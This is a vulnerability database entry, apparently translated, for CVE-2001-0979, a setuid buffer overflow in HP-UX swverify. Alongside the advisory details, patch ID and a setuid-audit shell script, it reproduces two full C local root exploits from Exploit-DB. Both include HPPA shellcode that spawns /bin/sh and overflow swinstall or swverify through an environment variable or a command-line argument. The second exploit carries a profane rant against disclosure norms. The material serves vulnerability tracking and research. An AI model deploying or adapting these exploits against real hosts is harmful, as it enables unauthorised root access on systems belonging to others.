CVE-2001-0979
CVSS 7.2
Published: 2001-09-03 00:00:00
Revised: 2008-09-05 16:25:23

[Original] Buffer overflow in swverify in HP-UX 11.0, and possibly other programs, allows local users to gain privileges via a long command line argument.


[CNNVD] HP-UX SWVerify Buffer Overflow Vulnerability (CNNVD-200109-004)

CVE(CAN) ID: CAN-2001-0979

HP-UX is a variant of the UNIX operating system released by Hewlett-Packard and is very widely deployed.

The "SWVerify" program shipped with HP-UX contains a buffer overflow: passing the program an argument of 6039 bytes overflows the buffer. Because the program is setuid, a local user can use it to elevate privileges, up to and including root.

- CVSS (Base Score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can lead to a complete system outage]
Access complexity: LOW [no special access conditions are required to exploit]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

cpe:/o:hp:hp-ux:11.00    HP-UX 11.00
cpe:/o:hp:hp-ux:10.10    HP HP-UX 10.10
cpe:/o:hp:hp-ux:10.20    HP HP-UX 10.20
cpe:/o:hp:hp-ux:10.01    HP HP-UX 10.01

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0979
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0979
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200109-004
(Official data source) CNNVD

- Other links and resources

http://xforce.iss.net/static/7078.php
(VENDOR_ADVISORY)  XF  hpux-swverify-bo(7078)
http://www.securityfocus.com/bid/3279
(VENDOR_ADVISORY)  BID  3279
http://www.securityfocus.com/archive/1/211687
(UNKNOWN)  BUGTRAQ  20010903 hpux warez

- Vulnerability information

HP-UX SWVerify Buffer Overflow Vulnerability
High severity    Boundary condition error
2001-09-03 00:00:00    2005-10-20 00:00:00
Local

- Advisories and patches

Interim workaround:

Until the patch is installed, we recommend temporarily removing the program's setuid bit:

#chmod a-s `which swverify`

Vendor patch:

The vendor has released a patch for this vulnerability; the patch ID is PHCO_23483.

Users of this software are advised to obtain the patch from the vendor's website:

http://www.hp.com/products1/unix/
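As an added example (not part of the CNNVD advisory or HP's own material), a POSIX shell audit for the interim workaround above: it lists setuid sw* binaries under a given directory, applies the advisory's `chmod a-s` to each, and reports how many remain. It runs here against a constructed temporary tree standing in for /usr/sbin; pointing it at the real directory checks a host.

```shell
#!/bin/sh
# Added example: audit and apply the "remove the setuid bit" workaround.
# The directory is a parameter so the same functions run against a
# constructed test tree (below) or against /usr/sbin on a real host.

# List regular files named sw* under $1 that still carry the setuid bit.
find_setuid_sw() {
    find "$1" -type f -name 'sw*' -perm -4000 2>/dev/null | sort
}

# Apply the advisory's mitigation to every match; print each path changed.
strip_setuid_sw() {
    find_setuid_sw "$1" | while IFS= read -r f; do
        chmod a-s "$f" && printf '%s\n' "$f"
    done
}

# Number of setuid sw* files left; 0 means the workaround is fully applied.
remaining_setuid_sw() {
    find_setuid_sw "$1" | wc -l | tr -d ' '
}

# Constructed test tree (no root needed: the setuid bit on a file we own
# can be set and cleared by us). Four "binaries" ship setuid, one does not.
demo_tree() {
    d=$(mktemp -d)
    for name in swverify swinstall swremove swlist; do
        printf '#!/bin/sh\n' > "$d/$name"
        chmod 4755 "$d/$name"           # setuid, as on a default install
    done
    printf '#!/bin/sh\n' > "$d/swfixed"
    chmod 0755 "$d/swfixed"             # already without setuid
    printf '%s\n' "$d"
}

# Stand-alone run: audit, mitigate, re-audit.
if [ "${1:-}" = "--demo" ]; then
    dir=$(demo_tree)
    echo "before: $(remaining_setuid_sw "$dir") setuid sw* files"
    strip_setuid_sw "$dir"
    echo "after:  $(remaining_setuid_sw "$dir") setuid sw* files"
fi
```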

- Vulnerability information (482)

HP-UX 11.0/11.11 swxxx Local Root Shell Exploit (EDBID:482)
hp-ux local
2002-12-11 Verified
0 watercloud
N/A
/*
 Program : x_hpux_11i_sw.c
 Use     : HP-UX 11.11/11.0 exploit swxxx to get local root shell.
 Compile : cc x_hpux_11i_sw.c -o x_sw;./x_sw  ( not use gcc for some system)
 Usage   : ./x_sw [ off ]
 Tested  : HP-UX B11.11 & HP-UX B11.0
 Author  : watercloud [@] xfocus.org
 Date    : 2002-12-11
 Note    : Use at your own risk !!
*/
#include <stdio.h>
#include <stdlib.h>    /* atoi, putenv */
#include <string.h>    /* strlen, memcpy */
#include <unistd.h>    /* execl */
#define T_LEN  2124
#define BUFF_LEN 1688
#define NOP 0x0b390280
char shellcode[]=
 "\x0b\x5a\x02\x9a\x34\x16\x03\xe8\x20\x20\x08\x01\xe4\x20\xe0\x08"
 "\x96\xd6\x04\x16\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22"
 "\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08\xb4\x16\x70\x16"
 "/bin/shA";

long addr;
char buffer_env[2496];
char buffer[T_LEN];

int main(int argc, char **argv)
{
   int addr_off = 8208;
   int  n=BUFF_LEN/4,i=0;
   long * ap = (long *) &buffer[BUFF_LEN];
   char * sp = &buffer[BUFF_LEN-strlen(shellcode)];
   long * np = (long *) buffer;
   /* the original tested argc > 0, which passed a NULL argv[1] to atoi
      whenever no offset was given on the command line */
   if(argc > 1)
       addr_off += atoi(argv[1]);
   addr = ( (long) &addr_off +addr_off) /4 * 4  +4;
   for(i=0;i<n;np[i++]=NOP);
   memcpy(sp,shellcode,strlen(shellcode));
   for(i=0;i<(T_LEN-BUFF_LEN)/4;ap[i++]=addr);
   buffer[T_LEN -2 ] += 1; buffer[T_LEN - 1 ] = '\0';
   /* the buffer is handed to the target through the LANG environment variable */
   sprintf(buffer_env,"LANG=AAA%s",buffer);
   putenv(buffer_env);
   execl("/usr/sbin/swinstall","swinstall","/tmp/null",NULL);
   /* if that fails, try swverify. */
   execl("/usr/sbin/swverify","swverify",NULL);
   return 1;   /* only reached when both execl calls fail */
}

// milw0rm.com [2002-12-11]

- Vulnerability information (21098)

HP-UX 11.0 SWVerify Buffer Overflow Vulnerability (EDBID:21098)
hp-ux local
2001-09-03 Verified
0 foo
N/A
source: http://www.securityfocus.com/bid/3279/info

HP-UX is the UNIX Operating System variant distributed by Hewlett-Packard, available for use on systems of size varying from workgroup servers to enterprise systems.

A problem has been discovered in the operating system that can allow a local user to gain elevated privileges. swverify contains a buffer overflow which is exploitable upon receiving 6039 bytes as an argument. The swverify program is setuid root, which allows a local user to execute code as root, potentially gaining administrative access to the vulnerable system.

/*

  Copyright FOO
  This code may be distributed freely so long as it is kept in its entirety.


http://www.counterpane.com/crypto-gram-0108.html#1

  "I have long said that the Internet is too complex to secure.  One of the
  reasons is that it is too complex to understand."

  "It's the authors of the worm and its variants, eEye for publicizing the
   vulnerability, and especially Microsoft for selling a product with this
   security problem."

Didn't you just say that the Internet is too complex to even understand let
alone secure?  And now it's Microsoft's fault.  How should they be able to
magically know all the answers?  Oh, I know, security is a process...

  "If software companies were held liable for systematic problems in
  its products, just like other industries (remember Firestone tires), we'd
  see a whole lot less of this kind of thing."

Yes, I remember Firestone tires.  Bridgestone/Firestone Inc. sold people
a bunch of faulty tires.  The wheel is certainly not "too complex to
understand".  After all, we've had 5000 years of R&D time; the public
expects products that work right.  Web servers, on the other hand, are
a somewhat newer invention.  Thanks for the phony analogy, Bruce.


  "You can argue that eEye did the right thing by publicizing this
  vulnerability, but I personally am getting a little tired of them adding
  weapons to hackers' arsenals. I support full disclosure and believe that
  it has done a lot to improve security, but eEye is going too far."

I could go into the whole full disclosure debate, but I'd honestly rather
get a root canal.  Instead, I'll just point out how wrong you are.  How can
you support full disclosure and not support eEye fully disclosing this issue
to the public?  More importantly, why do you even care?  The debate is over,
full disclosure died when Jeff Moss started blackhat, bugtraq went corporate,
and @stake bought the scene.  The community at large has already rejected
full disclosure. Anyone who thinks otherwise is naive.  In reality the so
called blackhats find most of the holes and only share them with their
friends.  Everyone can argue the pros and cons of full disclosure and try
to start up hopeless little private 0 day clubs for vendors and "authorized"
researchers until hell freezes over, or Microsoft releases a quality product.
In the end, it's just a bunch of people who don't know, arguing with the
bunch who don't get it.  Blame eEye and Microsoft all you want if it makes
you feel better.  If you bitch at them long enough they might just join the
rest of the real researchers out there who don't do public disclosure and
only report to known and trusted peers.  (read: other blackhats)

The real problem here is that the clueless have convinced themselves that the
computer security underground is nothing more than packs of socially
challenged adolescent boys running around with proof of concept exploit code
written by whitehats.  Some have even deluded themselves into thinking that
they should be the ones who are the gate keepers of vulnerability info.
(Russ Cooper comes to mind.) Congratulations, the war is over.  You won.  The
public is now either defenseless or paying by the hour.

Don't bite the hand that feeds you or you won't get any more scraps from
the table.

I will leave you with this HPUX 11 local root exploit code. /usr/sbin/sw*
are all setuid root by default and all contain buffer overflows. I didn't
bother notifying HP about this at all. I just don't give a fuck.

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* strlen; missing from the original */
#include <sys/types.h>
#include <unistd.h>

#define BUF_LENGTH 10102
#define STACK_OFFSET 0
#define EXTRA 4000
#define HPPA_NOP 0x3902800b //0x0b390280

u_char hppa_shellcode[] =
"\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40"
"\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"
"\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff\xff\xff";

/* Returns the current stack pointer. Relies on the HP-UX cc inline-asm
   convention (ret0 is the return register), so this does not build with gcc. */
u_long get_sp(void)
{
   __asm__("copy %sp,%ret0 \n");
}

int main(int argc, char *argv[])
{
   char buf[BUF_LENGTH+8];
   unsigned long targ_addr;
   u_long *long_p;
   u_char *char_p;
   int i, code_length = strlen(hppa_shellcode),dso=STACK_OFFSET,xtra=EXTRA;

   if(argc > 1) dso+=atoi(argv[1]);
   if(argc > 2) xtra+=atoi(argv[2]);

   long_p = (u_long *) buf;

   for (i = 0; i < (BUF_LENGTH - code_length - xtra) / sizeof(u_long); i++)
     *long_p++ = HPPA_NOP;

   char_p = (u_char *) long_p;

   for (i = 0; i < code_length; i++)
     *char_p++ = hppa_shellcode[i];

   targ_addr = get_sp() - dso;

   for (i = 0; i < xtra /4; i++)
   {
      *char_p++ =(targ_addr>>24)&255;
      *char_p++ =(targ_addr>>16)&255;
      *char_p++ =(targ_addr>>8)&255;
      *char_p++ =(targ_addr)&255;
    }
   /* terminate the argument string; the original left buf unterminated,
      so strlen() and execl() read past the filled region */
   *char_p = '\0';

   printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",targ_addr,(int)strlen(buf), xtra,dso);
   execl("/usr/sbin/swverify","swverify", buf,(char *) 0);
   perror("execl failed");
   return(-1);
}

- Vulnerability information

9620
HP-UX swverify Command Line Local Overflow
Local Access Required    Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

2001-09-03 Unknown
2001-09-03 Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

HP-UX SWVerify Buffer Overflow Vulnerability
Boundary Condition Error 3279
No Yes
2001-09-03 12:00:00 2009-07-11 07:56:00
This vulnerability was announced via the Bugtraq mailing list by <auto300526@hushmail.com> on September 3, 2001.

- Affected program versions

HP HP-UX 11.0

- Vulnerability discussion


- Exploitation

Contributed by <auto300526@hushmail.com>:

- Solution

HP has released a fix:


HP HP-UX 11.0

- Related references
